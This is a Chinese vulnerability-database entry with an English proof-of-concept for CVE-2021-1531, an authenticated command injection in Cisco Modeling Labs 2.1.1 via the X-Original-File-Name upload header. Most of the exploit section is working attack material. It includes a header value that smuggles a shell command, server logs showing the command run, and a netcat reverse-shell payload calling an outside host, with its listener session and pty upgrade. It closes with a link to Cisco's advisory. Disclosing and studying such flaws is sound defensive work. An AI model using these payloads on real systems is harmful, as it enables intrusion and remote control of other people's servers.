文章目录[隐藏]
Cisco Modeling Labs 参数注入漏洞
漏洞ID | 2451463 | 漏洞类型 | 参数注入 |
发布时间 | 2021-06-24 | 更新时间 | 2021-06-24 |
CVE编号 | CVE-2021-1531 | CNNVD-ID | CNNVD-202105-1277 |
漏洞平台 | N/A | CVSS评分 | N/A |
|漏洞来源
|漏洞详情
Cisco Modeling Labs是美国思科(Cisco)公司的一个应用软件。一个在工作站和服务器上运行的本地网络模拟工具。 Cisco Modeling Labs 存在参数注入漏洞,该漏洞源于对用户提供的web UI输入的验证不足,攻击者可利用该漏洞在底层操作系统上执行任意命令。
|漏洞EXP
Cisco Modeling Labs 2.1.1-b19 Post-Auth RCE Vulnerability
CVE-2021-1531
=======
Details
=======
Authenticated command injection in the web portal via the X-Original-File-Name header.
Tested with portal 'admin' user who does not have a system login or SSH access, but likely works for any user who can upload files in the portal.
=====
Repro
=====
-------
Request
-------
POST /api/v0/images/upload HTTP/1.1
Host: 10.10.10.118
X-Original-File-Name: test.rpm';id>/tmp/123'
Authorization: Bearer [jwt token]
Content-Length: 0
--------
Response
--------
HTTP/1.1 200 OK
Server: nginx/1.14.1
...
"Success"
----------------
Local monitoring
----------------
pid=5547 executed [/bin/sh -c /usr/local/bin/imagetool -stderrthreshold=INFO -multipart move '/var/local/virl2/nginx-temp-folder/0063443599' '/var/local/virl2/dropfolder/test.rpm';id>/tmp/123''; exit 0 ]
.....
pid=5555 executed [id ]
$ cat /tmp/123
uid=982(virl2) gid=980(virl2) groups=980(virl2),982(wireshark),986(libvirt) context=system_u:system_r:unconfined_service_t:s0
============
Exploitation
============
The netcat binary with -e support is installed on the system, which makes gaining a remote shell as the virl2 user easy for demo.
-------
Payload
-------
X-Original-File-Name: test.rpm';nc 10.1.1.101 5000 -e /bin/bash'
--------
Listener
--------
$ nc -l -p 5000
.....
*connection received from cml2*
/usr/libexec/platform-python -c 'import pty; pty.spawn("/bin/bash")'
*** VIRL2 network simulator monitor ***
CLI> uname -a
Linux cml2-controller.cml.lab 4.18.0-80.11.2.el8_0.x86_64 #1 SMP Tue Sep 24 11:32:19 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
CLI> pwd
/var/local/virl2
===
Fix
===
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cml-cmd-inject-N4VYeQXB
|参考资料
来源:tools.cisco.com
链接:https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cml-cmd-inject-N4VYeQXB
本文由 华域联盟 原创撰写:华域联盟 » Cisco Modeling Labs 参数注入漏洞
转载请保留出处和原文链接:https://www.cnhackhy.com/103983.htm